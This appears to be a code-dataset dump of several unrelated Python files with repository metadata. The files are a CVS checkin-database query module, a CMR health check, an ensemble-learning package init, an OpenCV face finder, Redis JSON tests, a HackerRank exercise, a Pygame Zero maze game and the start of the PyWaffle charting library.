elif self.__type == Commit.ADD:
return 'Add'
elif self.__type == Commit.REMOVE:
return 'Remove'
## LazyCommit overrides a few methods of Commit to only retrieve
## it's properties as they are needed
class LazyCommit(Commit):
def __init__(self, db):
Commit.__init__(self)
self.__db = db
def SetFileID(self, dbFileID):
self.__dbFileID = dbFileID
def GetFileID(self):
return self.__dbFileID
def GetFile(self):
return self.__db.GetFile(self.__dbFileID)
def SetDirectoryID(self, dbDirID):
self.__dbDirID = dbDirID
def GetDirectoryID(self):
return self.__dbDirID
def GetDirectory(self):
return self.__db.GetDirectory(self.__dbDirID)
def SetRepositoryID(self, dbRepositoryID):
self.__dbRepositoryID = dbRepositoryID
def GetRepositoryID(self):
return self.__dbRepositoryID
def GetRepository(self):
return self.__db.GetRepository(self.__dbRepositoryID)
def SetAuthorID(self, dbAuthorID):
self.__dbAuthorID = dbAuthorID
def GetAuthorID(self):
return self.__dbAuthorID
def GetAuthor(self):
return self.__db.GetAuthor(self.__dbAuthorID)
def SetBranchID(self, dbBranchID):
self.__dbBranchID = dbBranchID
def GetBranchID(self):
return self.__dbBranchID
def GetBranch(self):
return self.__db.GetBranch(self.__dbBranchID)
def SetDescriptionID(self, dbDescID):
self.__dbDescID = dbDescID
def GetDescriptionID(self):
return self.__dbDescID
def GetDescription(self):
return self.__db.GetDescription(self.__dbDescID)
## QueryEntry holds data on one match-type in the SQL database
## match is: "exact", "like", or "regex"
class QueryEntry:
def __init__(self, data, match):
self.data = data
self.match = match
## CheckinDatabaseQuery is an object which contains the search
## parameters for a query to the Checkin Database and -- after the
## query is executed -- the data returned by the query.
class CheckinDatabaseQuery:
def __init__(self):
## sorting
self.sort = "date"
## repository to query
self.repository_list = []
self.branch_list = []
self.directory_list = []
self.file_list = []
self.author_list = []
self.comment_list = []
## date range in DBI 2.0 timedate objects
self.from_date = None
self.to_date = None
## limit on number of rows to return
self.limit = None
self.limit_reached = 0
## list of commits -- filled in by CVS query
self.commit_list = []
## commit_cb provides a callback for commits as they
## are added
self.commit_cb = None
## has this query been run?
self.executed = 0
def SetRepository(self, repository, match = "exact"):
self.repository_list.append(QueryEntry(repository, match))
def SetBranch(self, branch, match = "exact"):
self.branch_list.append(QueryEntry(branch, match))
def SetDirectory(self, directory, match = "exact"):
self.directory_list.append(QueryEntry(directory, match))
def SetFile(self, file, match = "exact"):
self.file_list.append(QueryEntry(file, match))
def SetAuthor(self, author, match = "exact"):
self.author_list.append(QueryEntry(author, match))
def SetComment(self, comment, match = "exact"):
self.comment_list.append(QueryEntry(comment, match))
def SetSortMethod(self, sort):
self.sort = sort
def SetFromDateObject(self, ticks):
self.from_date = dbi.DateTimeFromTicks(ticks)
def SetToDateObject(self, ticks):
self.to_date = dbi.DateTimeFromTicks(ticks)
def SetFromDateHoursAgo(self, hours_ago):
ticks = time.time() - (3600 * hours_ago)
self.from_date = dbi.DateTimeFromTicks(ticks)
def SetFromDateDaysAgo(self, days_ago):
ticks = time.time() - (86400 * days_ago)
self.from_date = dbi.DateTimeFromTicks(ticks)
def SetToDateDaysAgo(self, days_ago):
ticks = time.time() - (86400 * days_ago)
self.to_date = dbi.DateTimeFromTicks(ticks)
def SetLimit(self, limit):
self.limit = limit;
def AddCommit(self, commit):
self.commit_list.append(commit)
def SetExecuted(self):
self.executed = 1
def SetLimitReached(self):
self.limit_reached = 1
def GetLimitReached(self):
assert self.executed
return self.limit_reached
def GetCommitList(self):
assert self.executed
return self.commit_list
##
## entrypoints
##
def CreateCommit():
return Commit()
def CreateCheckinQuery():
return CheckinDatabaseQuery()
def ConnectDatabase(cfg, readonly=0):
if readonly:
user = cfg.cvsdb.readonly_user
passwd = cfg.cvsdb.readonly_passwd
else:
user = cfg.cvsdb.user
passwd = cfg.cvsdb.passwd
db = CheckinDatabase(cfg.cvsdb.host, cfg.cvsdb.port, user, passwd,
cfg.cvsdb.database_name)
db.Connect()
return db
def ConnectDatabaseReadOnly(cfg):
return ConnectDatabase(cfg, 1)
def GetCommitListFromRCSFile(repository, path_parts, revision=None):
commit_list = []
directory = "/".join(path_parts[:-1])
file = path_parts[-1]
revs = repository.itemlog(path_parts, revision, vclib.SORTBY_DEFAULT,
0, 0, {"cvs_pass_rev": 1})
for rev in revs:
commit = CreateCommit()
commit.SetRepository(repository.rootpath)
commit.SetDirectory(directory)
commit.SetFile(file)
commit.SetRevision(rev.string)
commit.SetAuthor(rev.author)
commit.SetDescription(rev.log)
commit.SetTime(rev.date)
if rev.changed:
# extract the plus/minus and drop the sign
plus, minus = rev.changed.split()
commit.SetPlusCount(plus[1:])
commit.SetMinusCount(minus[1:])
if rev.dead:
commit.SetTypeRemove()
else:
commit.SetTypeChange()
else:
commit.SetTypeAdd()
commit_list.append(commit)
# if revision is on a branch which has at least one tag
if len(rev.number) > 2 and rev.branches:
commit.SetBranch(rev.branches[0].name)
return commit_list
def GetUnrecordedCommitList(repository, path_parts, db):
commit_list = GetCommitListFromRCSFile(repository, path_parts)
unrecorded_commit_list = []
for commit in commit_list:
result = db.CheckCommit(commit)
if not result:
unrecorded_commit_list.append(commit)
return unrecorded_commit_list
_re_likechars = re.compile(r"([_%\\])")
def EscapeLike(literal):
"""Escape literal string for use in a MySQL LIKE pattern"""
return re.sub(_re_likechars, r"\\\1", literal)
def FindRepository(db, path):
"""Find repository path in database given path to subdirectory
Returns normalized repository path and relative directory path"""
path = os.path.normpath(path)
dirs = []
while path:
rep = os.path.normcase(path)
if db.GetRepositoryID(rep, 0) is None:
path, pdir = os.path.split(path)
if not pdir:
return None, None
dirs.append(pdir)
else:
break
dirs.reverse()
return rep, dirs
def CleanRepository(path):
"""Return normalized top-level repository path"""
return os.path.normcase(os.path.normpath(path))
| 32.201826
| 79
| 0.565998
|
5f1710116d618a1f2c843a26b2cfab775e662153
| 515
|
py
|
Python
|
SearchAPI/CMR/Health.py
|
asfadmin/Discovery-SearchAPI
|
d5e0b3d3a6a74c7f243ddc74a2316cd7b7380edd
|
[
"BSD-3-Clause"
] | null | null | null |
SearchAPI/CMR/Health.py
|
asfadmin/Discovery-SearchAPI
|
d5e0b3d3a6a74c7f243ddc74a2316cd7b7380edd
|
[
"BSD-3-Clause"
] | null | null | null |
SearchAPI/CMR/Health.py
|
asfadmin/Discovery-SearchAPI
|
d5e0b3d3a6a74c7f243ddc74a2316cd7b7380edd
|
[
"BSD-3-Clause"
] | null | null | null |
import requests
import logging
import json
from SearchAPI.asf_env import get_config
def get_cmr_health():
cfg = get_config()
try:
r = requests.get(cfg['cmr_base'] + cfg['cmr_health'], timeout=10)
d = {'host': cfg['cmr_base'], 'health': json.loads(r.text)}
except Exception as e:
logging.debug(e)
d = {'host': cfg['cmr_base'], 'error': {
'display': 'ASF is experiencing errors loading data. Please try again later.',
'raw': f'{e}'}}
return d
| 30.294118
| 91
| 0.603883
|
de160c5607417762d7f9b804b462182469cb1b31
| 449
|
py
|
Python
|
creme/ensemble/__init__.py
|
Raul9595/creme
|
39cec7ac27ccd40ff0a7bdd6bceaf7ce25c1a8da
|
[
"BSD-3-Clause"
] | 1
|
2020-07-27T03:06:46.000Z
|
2020-07-27T03:06:46.000Z
|
creme/ensemble/__init__.py
|
2torus/creme
|
bcc5e2a0155663a1f0ba779c68f23456695bcb54
|
[
"BSD-3-Clause"
] | 1
|
2022-02-10T06:24:42.000Z
|
2022-02-10T06:24:42.000Z
|
creme/ensemble/__init__.py
|
igorol/creme
|
60977c4accfdca08cfd76a162095ff738ef87281
|
[
"BSD-3-Clause"
] | 1
|
2021-04-16T08:27:14.000Z
|
2021-04-16T08:27:14.000Z
|
"""
A module for ensemble learning.
"""
from .bagging import BaggingClassifier
from .bagging import BaggingRegressor
from .grouping import GroupRegressor
from .hedging import HedgeBinaryClassifier
from .hedging import HedgeRegressor
from .stacking import StackingBinaryClassifier
__all__ = [
'BaggingClassifier',
'BaggingRegressor',
'GroupRegressor',
'HedgeBinaryClassifier',
'HedgeRegressor',
'StackingBinaryClassifier'
]
| 22.45
| 46
| 0.777283
|
695526854b3bdc830a9a9b1e14624a183c8db031
| 1,269
|
py
|
Python
|
modules/face_morphs/face_finder.py
|
GrzegorzKrug/face_morph
|
64e5e47207d30ac8968a0b1b73e11a8ae74b3fec
|
[
"Apache-2.0"
] | null | null | null |
modules/face_morphs/face_finder.py
|
GrzegorzKrug/face_morph
|
64e5e47207d30ac8968a0b1b73e11a8ae74b3fec
|
[
"Apache-2.0"
] | null | null | null |
modules/face_morphs/face_finder.py
|
GrzegorzKrug/face_morph
|
64e5e47207d30ac8968a0b1b73e11a8ae74b3fec
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import glob
import cv2
import os
eye_cascade = cv2.CascadeClassifier("haarcascade_eye.xml")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
avatars = glob.glob("avatars/*png")
avatars.sort()
export_dir = "exports"
face_count = 0
MAX_SIZE = 256
os.makedirs(export_dir, exist_ok=True)
for avatar in avatars:
bgr_img = cv2.imread(avatar)
width, height, channels = bgr_img.shape
if width > MAX_SIZE or height > MAX_SIZE:
width = MAX_SIZE if width > MAX_SIZE else width
height = MAX_SIZE if height > MAX_SIZE else height
dim = (width, height)
bgr_img = cv2.resize(bgr_img, dim)
gray_image = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray_image, 1.1, 3)
for (x, y, w, h) in faces:
face_count += 1
pt1 = (x, y)
pt2 = (x + w, y + h)
cv2.rectangle(bgr_img, pt1, pt2, (0, 255, 55), 2)
eyes = eye_cascade.detectMultiScale(gray_image, 1.2, 8)
for (x, y, w, h) in eyes:
pt1 = (x, y)
pt2 = (x + w, y + h)
cv2.rectangle(bgr_img, pt1, pt2, (255, 85, 0), 2)
cv2.imwrite(os.path.join(export_dir, os.path.basename(avatar)), bgr_img)
print(f"Faces found: {face_count}")
| 28.2
| 76
| 0.651694
|
417dd3e9f81bfa959c226606727b4d97df184ef0
| 4,798
|
py
|
Python
|
tests/unittests/services/utils/test_db.py
|
hackaugusto/scenario-player
|
0701bb986f47e1ec4a4fb7a469157826da1993e2
|
[
"MIT"
] | null | null | null |
tests/unittests/services/utils/test_db.py
|
hackaugusto/scenario-player
|
0701bb986f47e1ec4a4fb7a469157826da1993e2
|
[
"MIT"
] | null | null | null |
tests/unittests/services/utils/test_db.py
|
hackaugusto/scenario-player
|
0701bb986f47e1ec4a4fb7a469157826da1993e2
|
[
"MIT"
] | null | null | null |
import json
from unittest import mock
import pytest
from scenario_player.services.utils.factories import construct_flask_app
from scenario_player.services.utils.db import JSONRedis
from scenario_player.exceptions.db import CorruptedDBEntry
db_import_path = 'scenario_player.services.utils.db'
@pytest.fixture
def app():
app = construct_flask_app(test_config={"TESTING": True})
with app.app_context():
yield
@mock.patch(f'{db_import_path}.Redis.hmget')
@mock.patch(f'{db_import_path}.Redis.hmset')
class TestJSONRedis:
@mock.patch(f'{db_import_path}.JSONRedis.set_json')
def test_tset_method_calls_set_json_with_table_attr_and_given_encode_kwargs(self, mock_set_json, _, __, app):
instance = JSONRedis('test_table')
instance.tset('my-key', {'key': 'value'})
expected_args = ('test_table', 'my-key', {'key': 'value'})
mock_set_json.assert_called_once()
actual_args, _ = mock_set_json.call_args
assert actual_args == expected_args
@mock.patch(f'{db_import_path}.JSONRedis.get_json')
def test_tget_method_calls_get_json_with_table_attr_and_given_decode_kwargs(self, mock_get_json, _, __, app):
instance = JSONRedis('test_table')
instance.tget('my-key')
expected_args = ('test_table', 'my-key')
mock_get_json.assert_called_once()
actual_args, _ = mock_get_json.call_args
assert actual_args == expected_args
def test_set_json_calls_hmset_method_with_json_encoded_string(self, patched_hmset, __, app):
instance = JSONRedis('test_table')
instance.set_json('test_table', 'key', {'k': 'v'})
patched_hmset.assert_called_once_with('test_table', {"key": '{"k": "v"}'})
@mock.patch(f'{db_import_path}.json.loads')
def test_get_json_applies_decoding_options_to_json_string(self, mock_loads, _, patched_hmget, app):
patched_hmget.return_value = '{"sth": "blah"}'
instance = JSONRedis('test_table', decoding_options={'option': 'value'})
instance.get_json('test_table', 'key')
mock_loads.assert_called_once_with('{"sth": "blah"}', option='value')
@mock.patch(f'{db_import_path}.json.dumps')
def test_set_json_applies_encoding_options_to_json_string(self, mock_dumps, _, __, app):
instance = JSONRedis('test_table', encoding_options={'option': 'value'})
instance.set_json('test_table', 'key', {'sth': 'blah'})
mock_dumps.assert_called_once_with({'sth': 'blah'}, option='value')
@mock.patch(f'{db_import_path}.json.dumps')
def test_encode_kwargs_passed_directly_to_set_json_take_precedence_over_encoding_options_stored_in_instance(self, mock_dumps, _, __, app):
instance = JSONRedis('test_table', encoding_options={'option': 'value'})
instance.set_json('test_table', 'key', {'sth': 'blah'}, option='nugget')
mock_dumps.assert_called_once_with({'sth': 'blah'}, option='nugget')
@mock.patch(f'{db_import_path}.json.loads')
def test_decode_kwargs_passed_directly_to_get_json_take_precedence_over_decoding_options_stored_in_instance(self, mock_loads, _, patched_hmget, app):
patched_hmget.return_value = '{"sth": "blah"}'
instance = JSONRedis('test_table', decoding_options={'option': 'value'})
instance.get_json('test_table', 'key', option='nugget')
mock_loads.assert_called_once_with('{"sth": "blah"}', option='nugget')
@mock.patch(f'{db_import_path}.json.dumps', side_effect=ValueError('from mock'))
def test_tset_method_propagates_ValueError_during_json_encoding_from_downstream(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(ValueError, match=r".*from mock.*"):
instance.tset('key', {'k': 'v'})
@mock.patch(f'{db_import_path}.json.loads', side_effect=json.JSONDecodeError('from mock', "", 0))
def test_tget_method_raises_CorruptedDBEntry_exception_if_JSONDecodeError_is_raised_downstream(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(CorruptedDBEntry):
instance.tget('key')
@mock.patch(f'{db_import_path}.json.dumps', side_effect=ValueError('from mock'))
def test_set_json_propagates_ValueError_during_json_encoding(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(ValueError, match=r".*from mock.*"):
instance.set_json('test_table', 'key', {"k": "v"})
@mock.patch(f'{db_import_path}.json.loads', side_effect=json.JSONDecodeError('from mock', "", 0))
def test_get_json_propagates_JSONDecodeError(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(json.JSONDecodeError, match=r".*from mock.*"):
instance.get_json('test_table', 'key')
| 48.464646
| 153
| 0.708003
|
04a6dff3f9df32462662b508919ebd8776d83ce5
| 447
|
py
|
Python
|
30 Days of Code/Day 17 More Exceptions/Solution.py
|
iamnambiar/HackerRank-Solutions
|
6fdcab79b18e66a6d7278b979a8be087f8f6c696
|
[
"MIT"
] | 2
|
2020-04-06T10:32:08.000Z
|
2021-04-23T04:32:45.000Z
|
30 Days of Code/Day 17 More Exceptions/Solution.py
|
iamnambiar/HackerRank-Solutions
|
6fdcab79b18e66a6d7278b979a8be087f8f6c696
|
[
"MIT"
] | null | null | null |
30 Days of Code/Day 17 More Exceptions/Solution.py
|
iamnambiar/HackerRank-Solutions
|
6fdcab79b18e66a6d7278b979a8be087f8f6c696
|
[
"MIT"
] | null | null | null |
# https://www.hackerrank.com/challenges/30-more-exceptions/problem
#Write your code here
class Calculator:
def power(self, n, p):
if n<0 or p<0:
raise Exception("n and p should be non-negative")
return n**p
myCalculator=Calculator()
T=int(input())
for i in range(T):
n,p = map(int, input().split())
try:
ans=myCalculator.power(n,p)
print(ans)
except Exception as e:
print(e)
| 24.833333
| 66
| 0.608501
|
282bef162a1e3575d46faa964f5eb67bf834654a
| 6,956
|
py
|
Python
|
mazegame/mazegame2.py
|
kantel/pygamezero
|
93c202a2bd5bcc827eabe952575b7714b36e4b9d
|
[
"MIT"
] | 1
|
2020-06-29T00:36:07.000Z
|
2020-06-29T00:36:07.000Z
|
mazegame/mazegame2.py
|
kantel/pygamezero
|
93c202a2bd5bcc827eabe952575b7714b36e4b9d
|
[
"MIT"
] | null | null | null |
mazegame/mazegame2.py
|
kantel/pygamezero
|
93c202a2bd5bcc827eabe952575b7714b36e4b9d
|
[
"MIT"
] | null | null | null |
# Simple Maze Game with Pygame Zero (v 1.2) , Python 3
# Stage 2 (Objektorientierung)
# Assets: DawnLike-Tileset (CC BY 4.0) by DawnBringer und DragonDePlatino
# (https://opengameart.org/content/dawnlike-16x16-universal-rogue-like-tileset-v181)
# Jörg Kantel 2022 (MIT-Lizenz)
import pgzrun
# WIDTH: 25 Tiles á 16 Pixel + je 20 Pixel Rand
WIDTH = 440
# HEIGHT: 25 Tiles á 16 Pixel + je 20 Pixel Rand
HEIGHT = 440
TITLE = "Mazegame Stage 2"
WALL = 63
DOOR = 62
CHEST = 22
margin_x = 20
margin_y = 20
sz = 16 # Step-/Tile-Size
maze_map = [[63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,-1,-1,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63],
[63,-1,-1,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,63,63,-1,-1,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,63,63,-1,-1,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63,63],
[63,63,63,63,63,63,-1,-1,63,63,-1,-1,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63,63],
[63,63,63,63,63,63,-1,-1,63,63,-1,-1,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,63,63,63,63,63,-1,-1,63,63,-1,-1,-1,-1,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,22,-1,63,63,63,63,63],
[63,-1,-1,63,63,63,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63],
[63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,63,63,63,63,63,-1,22,63],
[63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63,-1,-1,63],
[63,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,63,63,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,22,-1,-1,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62],
[63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63]]
class Wall(Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
def set_screen_pos(self, x, y):
self.x = x
self.y = y
self.topleft = margin_x + self.x*sz, margin_y + self.y*sz
class Door(Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
self.status = "closed"
def set_screen_pos(self, x, y):
self.x = x
self.y = y
self.topleft = margin_x + self.x*sz, margin_y + self.y*sz
class Chest (Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
self.score = 100
def set_screen_pos(self, x, y):
self.x = x
self.y = y
self.topleft = margin_x + self.x*sz, margin_y + self.y*sz
class Rogue(Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
self.xpos = 1 # x-Position im Grid
self.ypos = 1 # y-Position im Grid
# Rogue ohne Animation auf Startposition setzen
self.topleft = margin_x + self.xpos*sz, margin_y + self.ypos*sz
self.dir = None
self.score = 0
def set_screen_pos(self):
x, y = margin_x + self.xpos*sz + 0.5*sz, margin_y + self.ypos*sz + 0.5*sz
animate(self, duration = .2, pos = (x, y))
def walk(self):
if self.dir == "left":
move_to_x = self.xpos - 1
move_to_y = self.ypos
self.dir = None
# Kollisionserkennung
if (move_to_x, move_to_y) not in walls_pos:
self.xpos -= 1
self.set_screen_pos()
elif self.dir == "right":
move_to_x = self.xpos + 1
move_to_y = self.ypos
self.dir = None
# Kollisionserkennung
if (move_to_x, move_to_y) not in walls_pos:
self.xpos += 1
self.set_screen_pos()
elif self.dir == "up":
move_to_x = self.xpos
move_to_y = self.ypos - 1
self.dir = None
# Kollisionserkennung
if (move_to_x, move_to_y) not in walls_pos:
self.ypos -= 1
self.set_screen_pos()
elif self.dir == "down":
move_to_x = self.xpos
move_to_y = self.ypos + 1
self.dir = None
# Kollisionserkennung
if (move_to_x, move_to_y) not in walls_pos:
self.ypos += 1
self.set_screen_pos()
rogue = Rogue("rogue16")
walls = []
chests = []
doors = []
walls_pos = []
chests_pos = []
def init_game():
for y in range(25):
for x in range(25):
if maze_map[y][x] == WALL:
wall = Wall("wall16")
wall.set_screen_pos(x, y)
walls.append(wall)
walls_pos.append((x, y))
if maze_map[y][x] == DOOR:
door = Door("door16")
door.set_screen_pos(x, y)
doors.append(door)
walls_pos.append((x, y))
if maze_map[y][x] == CHEST:
chest = Chest("chest16")
chest.set_screen_pos(x, y)
chests.append(chest)
chests_pos.append((x, y))
def update():
rogue.walk()
for chest in chests:
if rogue.colliderect(chest):
rogue.score += chest.score
chests.remove(chest)
print(rogue.score)
def draw():
screen.fill((90, 90, 90))
for wall in walls:
wall.draw()
for door in doors:
door.draw()
for chest in chests:
chest.draw()
rogue.draw()
def on_key_down(key):
if key == keys.LEFT:
rogue.dir = "left"
elif key == keys.RIGHT:
rogue.dir = "right"
elif key == keys.UP:
rogue.dir = "up"
elif key == keys.DOWN:
rogue.dir = "down"
if key == keys.ESCAPE: # ESCAPE beendet das Spiel
print("Bye, bye, Baby!")
quit()
init_game()
pgzrun.go()
| 35.671795
| 89
| 0.502156
|
dc8a2fdf395d3f8c44d35ad89a5b0b3e05b5b6b9
| 19,904
|
py
|
Python
|
pywaffle/waffle.py
|
tweakimp/PyWaffle
|
8c5611221e27f941dd1539147127d73fc6575c64
|
[
"MIT"
] | null | null | null |
pywaffle/waffle.py
|
tweakimp/PyWaffle
|
8c5611221e27f941dd1539147127d73fc6575c64
|
[
"MIT"
] | null | null | null |
pywaffle/waffle.py
|
tweakimp/PyWaffle
|
8c5611221e27f941dd1539147127d73fc6575c64
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*-coding: utf-8 -*-
from matplotlib.pyplot import cm
from matplotlib.figure import Figure
from matplotlib.patches import Rectangle, Patch
import matplotlib.font_manager as fm
from matplotlib.text import Text
from matplotlib.legend_handler import HandlerBase
import copy
import os
import font
from itertools import product
import warnings
from typing import List, Tuple, Union
import math
METHOD_MAPPING = {
'float': lambda a, b: a / b,
'nearest': lambda a, b: round(a / b),
'ceil': lambda a, b: math.ceil(a/b),
'floor': lambda a, b: a // b,
}
def division(x: int, y: int, method: str = 'float') -> Union[int, float]:
"""
:param x: dividend
:param y: divisor
:param method: {'float', 'nearest', 'ceil', 'floor'}
"""
return METHOD_MAPPING[method.lower()](x, y)
def array_resize(array: Union[Tuple, List], length: int, array_len: int = None):
"""
Resize array to given length. If the array is shorter than given length, repeat the array; If the array is longer
than the length, trim the array.
:param array: array
:param length: target length
:param array_len: if length of original array is known, pass it in here
:return: axtended array
"""
if not array_len:
array_len = len(array)
return array * (length // array_len) + array[:length % array_len]
_FONT_PATH = font.__path__[0]
FONTAWESOME_FILES = {
'brands': os.path.join(_FONT_PATH, 'Font Awesome 5 Brands-Regular-400.otf'),
'solid': os.path.join(_FONT_PATH, 'Font Awesome 5 Free-Solid-900.otf'),
'regular': os.path.join(_FONT_PATH, 'Font Awesome 5 Free-Regular-400.otf'),
}
class TextLegendBase(object):
def __init__(self, text, color, **kwargs):
self.text = text
self.color = color
self.kwargs = kwargs
class SolidTextLegend(TextLegendBase):
def __init__(self, text, color, **kwargs):
super().__init__(text, color, **kwargs)
class RegularTextLegend(TextLegendBase):
def __init__(self, text, color, **kwargs):
super().__init__(text, color, **kwargs)
class BrandsTextLegend(TextLegendBase):
def __init__(self, text, color, **kwargs):
super().__init__(text, color, **kwargs)
LEGENDSTYLE = {'solid': SolidTextLegend, 'regular': RegularTextLegend, 'brands': BrandsTextLegend}
class TextLegendHandler(HandlerBase):
def __init__(self, font_file):
super().__init__()
self.font_file = font_file
def create_artists(self, legend, orig_handle, xdescent, ydescent, width, height, fontsize, trans):
x = xdescent + width / 2.0
y = ydescent + height / 2.0
kwargs = {
'horizontalalignment': 'center',
'verticalalignment': 'center',
'color': orig_handle.color,
'fontproperties': fm.FontProperties(fname=self.font_file, size=fontsize)
}
kwargs.update(orig_handle.kwargs)
annotation = Text(x, y, orig_handle.text, **kwargs)
return [annotation]
HANDLER_MAP = {
SolidTextLegend: TextLegendHandler(FONTAWESOME_FILES['solid']),
RegularTextLegend: TextLegendHandler(FONTAWESOME_FILES['regular']),
BrandsTextLegend: TextLegendHandler(FONTAWESOME_FILES['brands'])
}
class Waffle(Figure):
"""
A custom Figure class to make waffle charts.
:param values: Numerical value of each category. If it is a dict, the keys would be used as labels.
:type values: list|dict|pandas.Series
:param rows: The number of lines of the waffle chart. This is required unless it is specified in argument plots.
:type rows: int
:param columns: The number of columns of the waffle chart.
If it is not None, the total number of blocks would be decided through rows and columns. [Default None]
:type columns: int
:param colors: A list of colors for each category. Its length should be the same as values.
Default values are from Set2 colormap.
:type colors: list[str]|tuple[str]
:param labels: The name of each category.
If the values is a dict, this parameter would be replaced by the keys of values.
:type labels: list[str]|tuple[str]
:param legend: Parameters of matplotlib.pyplot.legend in a dict.
E.g. {'loc': '', 'bbox_to_anchor': (,), ...}
See full parameter list in https://matplotlib.org/api/_as_gen/matplotlib.pyplot.legend.html
:type legend: dict
:param interval_ratio_x: Ratio of horizontal distance between blocks to block's width. [Default 0.2]
:type interval_ratio_x: float
:param interval_ratio_y: Ratio of vertical distance between blocks to block's height. [Default 0.2]
:type interval_ratio_y: float
:param block_aspect_ratio: The ratio of block's width to height. [Default 1]
:type block_aspect_ratio: float
:param cmap_name: Name of colormaps for default color, if colors is not assigned.
See full list in https://matplotlib.org/examples/color/colormaps_reference.html [Default 'Set2']
:type cmap_name: str
:param title: Parameters of matplotlib.axes.Axes.set_title in a dict.
E.g. {'label': '', 'fontdict': {}, 'loc': ''}
See full parameter list in https://matplotlib.org/api/_as_gen/matplotlib.axes.Axes.set_title.html
:type title: dict
:param icons: Icon name of Font Awesome. If it is a string, all categories use the same icon;
If it's a list or tuple of icons, the length should be the same as values.
See the full list of Font Awesome on https://fontawesome.com/icons?d=gallery&m=free [Default None]
:type icons: str|list[str]|tuple[str]
:param icon_set: Deprecated. {'brands', 'regular', 'solid'}
The style of icons to be used.
[Default 'solid']
:type icon_set: str|list[str]|tuple[str]
:param icon_style: The style of icons to be used.
Font Awesome Icons find an icon by style and icon name. The style could be 'brands', 'regular' and 'solid'.
Visit https://fontawesome.com/cheatsheet for detail.
If it is a string, it would search icons within given style. If it is a list or a tuple, the length should be
the same as values and it means the style for each icon.
[Default 'solid']
:type icon_style: str|list[str]|tuple[str]
:param icon_size: Fint size of the icons.
The default size is not fixed and depends on the block size.
Either an relative value of 'xx-small', 'x-small', 'small', 'medium', 'large', 'x-large', 'xx-large' or an absolute font size, e.g., 12
:type icon_size: int
:param icon_legend: Whether to use icon but not color bar in legend. [Default False]
:type icon_legend: bool
:param plot_anchor: {'C', 'SW', 'S', 'SE', 'E', 'NE', 'N', 'NW', 'W'}
The alignment method of subplots.
See details in https://matplotlib.org/devdocs/api/_as_gen/matplotlib.axes.Axes.set_anchor.html
[Default 'W']
:type plot_anchor: str
:param plots: Location and parameters of Waffle class for subplots in a dict,
with format like {loc: {subplot_args: values, }, }.
loc is a 3-digit integer. If the three integers are I, J, and K,
the subplot is the Ith plot on a grid with J rows and K columns.
The parameters of subplots are the same as Waffle class parameters, excluding plots itself.
Nested subplots is not supported.
If any parameter of subplots is not assigned, it use the same parameter in Waffle class as default value.
:type plots: dict
:param plot_direction: Deprecated. {'NW', 'SW', 'NE', 'SE'}
Use starting_location instead.
Change the starting location plotting the blocks.
'NW' means plots start at upper left and end at lower right;
For 'SW', plots start at lower left and end at upper right;
For 'NE', plots start at upper right and end at lower left;
For 'SE', plots start at lower right and end at upper left.
[Default 'SW']
:type plot_direction: str
:param vertical: decide whether to draw the plot vertically or horizontally.
[Default False]
:type vertical: bool
:param starting_location: {'NW', 'SW', 'NE', 'SE'}.
Change the starting location plotting the blocks
'NW' means plots start at upper left;
For 'SW', plots start at lower left;
For 'NE', plots start at upper right;
For 'SE', plots start at lower right.
[Default 'SW']
:type plot_direction: str
:param rounding_rule: {'nearest', 'floor', 'ceil'}.
